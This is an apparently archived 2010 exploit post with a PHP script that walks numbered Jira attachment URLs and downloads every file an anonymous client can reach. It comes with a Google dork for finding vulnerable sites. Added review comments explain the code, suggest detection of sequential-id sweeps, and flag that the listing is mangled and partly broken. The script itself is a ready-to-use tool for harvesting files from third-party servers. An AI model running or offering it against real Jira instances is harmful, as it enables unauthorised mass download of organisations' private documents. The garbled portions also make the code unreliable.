Jira Atlassian File Attachment Download
Posted on 30 March 2010
======================================= Jira Atlassian File Attachment Download ======================================= # Exploit Title: Jira Atlassian # Date: 28/3/2010 # Author: Ignacio Garrido # Mail: Ign.sec gmail com # Software Link: http://www.atlassian.com/software/jira/JIRADownloadCenter.jspa # Version: 3.X (Maybe 4.X) # Tested on: Windos & Linux # Code : <?php
/* Author's note: if the site uses https, you MUST specify it in the URL or it
   won't work. Try using numbers that you get from your results in google,
   otherwise you will get a lot of 404. */

/*
 * Review summary of what the visible code does:
 *  - Reads a base attachment URL and a numeric range from the command line.
 *  - For every number in the range it calls get_headers() on "<url><number>/".
 *    No credentials, cookies or stream context are passed anywhere in the
 *    script, so whatever it retrieves is what the server hands to an
 *    anonymous client.
 *  - On anything other than a 404 it takes a file name out of a response
 *    header, fetches "<url><number>/<name>" and writes the body to the
 *    current directory under that name.
 *
 * Defensive reading: the script depends on attachments being addressable by a
 * plain number under /secure/attachment/ and being served without a session.
 * The page does not say whether that is a product flaw or an instance that
 * allows anonymous access - confirm against the vendor documentation for the
 * affected version. Server-side, this traffic shows up as one client walking
 * consecutive ids under that path with a high share of 404 responses;
 * reviewing which projects permit anonymous browsing and alerting on
 * sequential-id sweeps are the checks that follow from it.
 *
 * NOTE(review): the listing was extracted with its line breaks collapsed, so
 * the multi-line banner strings below appear with single spaces where the
 * author's file presumably had newlines.
 */

// Banner, printed on every run.
echo " ######################################################### ################### # #Attachment downloader by Scuarplex #";

// Exactly three arguments are required (script name + 3 = 4); otherwise print usage and stop.
if ($argc != 4){echo " #Usage: php Scuarji.php vulnsite FROM(NUMBER) TO(NUMBER) # #Dork: inurl:/jira/secure/attachment/ # #Example: php Scuarji.php http://www.vulnsite/jira/secure/attachment/ 1 12310371# ############################################################################ ";die;}
// NOTE(review): the second echo in the else branch is reproduced exactly as
// extracted. As it stands, the "#" after the first closing quote starts a
// comment, so the quote/brace structure here probably does not match the
// author's original file - TODO confirm against an unmangled copy.
else{
echo " #Let's start! ";
echo "# #Ign.sec@Gmail.com "; # ############################################################################ ";}

// Default to http:// when the first argument carries no scheme.
$url2 = $argv[1];
if (substr($url2,0,7) != "http://" && substr($url2,0,8) != "https://")
{
    $url = ("http://".$url2);
}
else
{
    $url = $argv[1];
}

// Range check. argv values are strings and nothing here verifies that they are numeric.
if ($argv[2] >= $argv[3])
{
    echo " #The second number must be bigger than the first one ";
    die;
}

$numero = $argv[2];
// Walk the range inclusively; the first for-expression is a no-op because $numero is already set.
for ($numero;$numero <= $argv[3];$numero++)
{
    // Header-only probe of "<url><number>/". The return value is not checked before it is indexed.
    $head = get_headers("$url$numero/");
    // Characters 9-11 of a status line such as "HTTP/1.1 404 Not Found" are the status code.
    // Only 404 is treated as a miss; every other status falls through to the download branch.
    if (substr ($head[0],9,3) == "404")
    {
        echo " #File number $numero not found! (404) ";
    }
    else{
        // Assumes the header at index 2 is the one carrying a "filename*=" parameter
        // (presumably Content-Disposition) - the position is hard-coded, not searched for.
        $explodeo = explode("filename*=",$head[2]);
        // Keep only the value up to the next ";" parameter separator.
        $explodeo2 = explode(";",$explodeo[1]);
        // Drop the first 7 characters - presumably the "UTF-8''" charset prefix of an
        // extended filename parameter; TODO confirm against a real response.
        $archivo = substr($explodeo2[0],7);
        echo " #Downloading file: $archivo ";
        // Second request fetches the body at "<url><number>/<name>".
        $file=file_get_contents("$url$numero/$archivo");
        // NOTE(review): $archivo comes straight from the response header and is used as the
        // local path unchanged; nothing here strips directory components, and a failed
        // fetch (false) is written out as well. Anyone handling this sample should run it
        // only in a throwaway directory.
        file_put_contents($archivo,$file);
    }
}
// Printed unconditionally - it does not reflect whether any download actually succeeded.
echo " #All attachment downloaded correctly! ";
die;
?> # Inj3ct0r.com [2010-03-30]